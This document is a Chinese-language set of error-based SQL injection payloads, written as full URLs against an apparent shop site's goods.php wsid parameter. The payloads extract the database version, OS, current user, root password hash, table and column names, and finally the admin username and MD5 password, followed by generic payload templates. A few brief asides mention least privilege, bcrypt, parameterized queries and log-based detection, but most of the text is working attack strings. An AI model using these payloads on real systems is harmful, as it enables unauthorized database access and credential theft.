判断版本号
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash(此查询只有在 Web 应用所用的数据库账号能读取 mysql.user 时才会返回结果;按最小权限原则,应用账号不应拥有 mysql 系统库的权限)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库表名
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 user_name 字段
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
获得 admin passwd(md5)(MD5 是快速哈希,一旦泄露容易被离线破解;口令应使用 bcrypt、argon2 等专用算法存储)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
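报错注射(报错注入):以下语句与上面各 URL 属于同一类手法,让 count(*) 与 group by floor(rand()*2) 在分组时产生重复键错误,错误信息中会带出 concat 拼入的子查询结果。它只在应用把参数直接拼进 SQL、并且把数据库错误回显给客户端时才成立;修复方式是对 wsid、uid 这类数值参数使用参数化查询或强制整数转换,并关闭对外的数据库错误回显。检测时可在访问日志或 WAF 中匹配请求参数里同时出现的 floor(rand( 、group by 与 information_schema。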
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)